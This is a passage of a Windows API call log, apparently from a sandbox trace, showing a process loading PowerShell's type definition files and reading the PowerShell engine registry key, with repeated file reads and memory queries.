	[0282.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0282.033] SetErrorMode (uMode=0x1) returned 0x1
	[0282.033] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad2a0 | out: lpFileInformation=0x1ad2a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0282.033] SetErrorMode (uMode=0x1) returned 0x1
	[0282.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0282.034] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad388 | out: phkResult=0x1ad388*=0x330) returned 0x0
	[0282.034] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad30c, lpData=0x0, lpcbData=0x1ad308*=0x0 | out: lpType=0x1ad30c*=0x1, lpData=0x0, lpcbData=0x1ad308*=0x56) returned 0x0
	[0282.034] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ea820
	[0282.034] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2dc, lpData=0x1b6ea820, lpcbData=0x1ad2d8*=0x56 | out: lpType=0x1ad2dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad2d8*=0x56) returned 0x0
	[0282.034] CoTaskMemFree (pv=0x1b6ea820) 
	[0282.034] RegCloseKey (hKey=0x330) returned 0x0
	[0282.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0282.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0282.062] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0282.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0282.982] SetErrorMode (uMode=0x1) returned 0x1
	[0282.982] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0282.982] GetFileType (hFile=0x330) returned 0x1
	[0282.982] SetErrorMode (uMode=0x1) returned 0x1
	[0282.982] GetFileType (hFile=0x330) returned 0x1
	[0283.524] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.525] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.525] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.525] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.526] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.526] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.526] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.526] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.526] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.527] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.527] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.527] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.528] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.528] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.528] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.528] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.529] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.530] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.530] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.530] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.530] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.531] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.531] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.531] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.531] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.531] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.532] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.532] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.532] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.532] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.533] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.533] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.533] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.535] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.535] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.535] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.536] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.536] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.536] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.536] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.537] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1000, lpOverlapped=0x0) returned 1
	[0283.537] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x1b4, lpOverlapped=0x0) returned 1
	[0283.537] ReadFile (in: hFile=0x330, lpBuffer=0x2c957d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad328, lpOverlapped=0x0 | out: lpBuffer=0x2c957d8*, lpNumberOfBytesRead=0x1ad328*=0x0, lpOverlapped=0x0) returned 1
	[0283.537] CloseHandle (hObject=0x330) returned 1
	[0283.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0283.537] SetErrorMode (uMode=0x1) returned 0x1
	[0283.537] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad2a0 | out: lpFileInformation=0x1ad2a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0283.538] SetErrorMode (uMode=0x1) returned 0x1
	[0283.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0283.538] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad388 | out: phkResult=0x1ad388*=0x330) returned 0x0
	[0283.538] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad30c, lpData=0x0, lpcbData=0x1ad308*=0x0 | out: lpType=0x1ad30c*=0x1, lpData=0x0, lpcbData=0x1ad308*=0x56) returned 0x0
	[0283.538] CoTaskMemAlloc (cb=0x5a) returned 0x3d87c0
	[0283.538] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2dc, lpData=0x3d87c0, lpcbData=0x1ad2d8*=0x56 | out: lpType=0x1ad2dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad2d8*=0x56) returned 0x0
	[0283.538] CoTaskMemFree (pv=0x3d87c0) 
	[0283.538] RegCloseKey (hKey=0x330) returned 0x0
	[0283.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0283.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0287.073] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.731] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.732] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.733] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.733] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.733] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.733] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.735] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.747] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.747] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.747] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.747] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.747] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.747] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.748] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.748] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.756] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.464] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.464] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.464] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.465] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.465] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.466] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.466] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.466] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.466] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
